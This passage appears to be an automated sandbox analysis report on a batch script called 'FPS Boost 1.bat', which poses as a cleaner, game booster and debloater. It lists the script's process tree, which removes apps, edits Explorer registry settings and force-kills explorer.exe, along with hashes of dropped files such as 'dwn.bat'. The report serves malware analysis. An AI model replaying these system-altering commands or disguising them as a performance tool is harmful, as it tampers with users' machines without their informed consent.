  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:400
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:2928
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Facebook* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:100
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Twitter* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:1848
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Drawboard PDF* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:2588
                                                                                                                                                                        • C:\Windows\System32\reg.exe
                                                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1052
                                                                                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                                            PID:4468
                                                                                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Modifies visibility of file extensions in Explorer
                                                                                                                                                                            PID:2644
                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                            taskkill /f /im explorer.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:1980
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            explorer.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:3228
                                                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                                                            findstr /v /a:08 /R "^$" " Version 2.0 " nul
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3592
                                                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                                                              findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1736
                                                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                                                findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3796
                                                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                                                  findstr /v /a:B /R "^$" " 1 " nul
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1452
                                                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2844
                                                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                                                      findstr /v /a:F /R "^$" " Cleaner " nul
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4612
                                                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4512
                                                                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                                                                          findstr /v /a:B /R "^$" " 2 " nul
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4312
                                                                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                                                                            findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4868
                                                                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                                                                              findstr /v /a:F /R "^$" " Game Booster " nul
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:936
                                                                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                  findstr /v /a:B /R "^$" " 3 " nul
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3476
                                                                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                    findstr /v /a:B /R "^$" " 7 " nul
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                      findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:400
                                                                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                        findstr /v /a:F /R "^$" " Debloat " nul
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1720
                                                                                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                          findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1604
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:3488
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:1464
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:1248
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:4416
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3660
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4700
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:2772
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4392
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2468
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    PID:4436
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3368
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2648
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:508
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2880
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3792
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    PID:4132
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4332
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4672
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:4512
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3148
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:1948
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3608
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3792
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:976
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:536
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:2680
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3132
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:1604
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4184
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:984
  • C:\Windows\explorer.exe
    explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2988
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3820
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:3700
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                            explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4280
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:3436
                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:2712
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4192
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1736
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5104
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:3944
                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1784
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4080
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:548
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4976
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2072
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:424

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 56c43715e0e7fa58012d8a5769d8d568
  SHA1: 4370ca3436f2e3a95b47a728503a2c22a5a5fa39
  SHA256: 8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
  SHA512: b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: cf70f70f9c094c99b5d7b8a1fabd9513
  SHA1: 6ea5b0d7a9c431d27b6c8c313ddf1289313f64cd
  SHA256: 0476b6e80795f5d3cb917f6315469a157fca6318eaa7618453bce0f670157fde
  SHA512: dadbf08b99245a9aa10f2bf98beb95248823dc8838cf76eb0628a011437ba5625f766c86cd0cbcb2f22ddc7cced3cae933e7202cb359a2b140790d4a0b6a8f6c

• C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\M6JCG2RK\microsoft.windows[1].xml
  Filesize: 96B
  MD5: 732a32ad072ef786d816a4f85b1b6bea
  SHA1: fe1945717c160ac3266f291564a003c044d409b0
  SHA256: 7dd2262373fcd6ebe2ed2c6e66242c85b1434c3fe23ca92ba41ae328ce8b941e
  SHA512: 55b57d5bf942f20a3557f20adeebb4c01cde4aec9d7a4fa8bfe6281fe0981773d8ce637fdbd1dc64f25abe72d75fad2a6538fadc86483ede9fdc5b59c0d36b79

• C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133740748476027766.txt
  Filesize: 75KB
  MD5: 703801b739b4e74d5e5ecd811d0a9dd7

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        35b8d5817b208942a0fe30603cadf0f35ce3f0e8

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        b7876635cc3e3898e9594a5d6be9fd1125c212ac4392ee9b7789473e48be33bd

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a7619e7a827103488b6f3fa80b2162d1fb93ad5d9c13db8d18857c149ed34dbc3c7e69497c9514fe6b4c2b3a702ff1b1ed09978ddadb500b6131d8d61c4835f8

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edk1szmo.p4w.ps1

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\FPS Boost 1.bat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        55KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        76f94fe08cc7b659f2d6b8e475a74baa

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6bee16deff8a87e3f02d4b11380da60bf976a240

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        fd5967c4267c8fde06482595aff50653e801cd0cb0110a5799fa0d2c7bb0f0b1

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        1ce7656aa64d2e1809a8fb1ea2b9ffb03213b63b99330ec5a1ccd792ceae85f7d52a42e4ca1aadad45ba4a01e10a12a03b162936838fc2a57bc079211e92bb54

                                                                                                                                                                                                                                                                      • C:\Users\Public\dwn.bat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        634B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        cf04779e43afe21e2420e4fc4641c551

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        59143b29ad70180bbd90daaf12f9309eb4625fc4

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        f03f052041664c4359f61f7acc64705d15d821f445af92cd74d8ddf8056f1701

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        4c712fe8ec9bbad7c34848aa46c44de62c9974f1a89fb27922868392a656c389a33e7ba63418e128524969f9c96e1ea7c39b24e77f53799d67c0b6b86df94dcb

                                                                                                                                                                                                                                                                      • C:\Windows\System32\ ]

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        3B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        df66fa563a2fafdb93cc559deb0a38c4

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        e6666cf8574b0f7a9ae5bccee572f965c2aec9cb

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        3e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        34ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18

                                                                                                                                                                                                                                                                      • memory/508-993-0x00000000043A0000-0x00000000043A1000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/536-1561-0x0000000004B40000-0x0000000004B41000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/976-1443-0x000001F3963E0000-0x000001F396400000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/976-1457-0x000001F3969F0000-0x000001F396A10000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/976-1426-0x000001F396620000-0x000001F396640000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/976-1422-0x000001F395500000-0x000001F395600000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/976-1421-0x000001F395500000-0x000001F395600000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/984-1715-0x000001C658600000-0x000001C658620000-memory.dmp

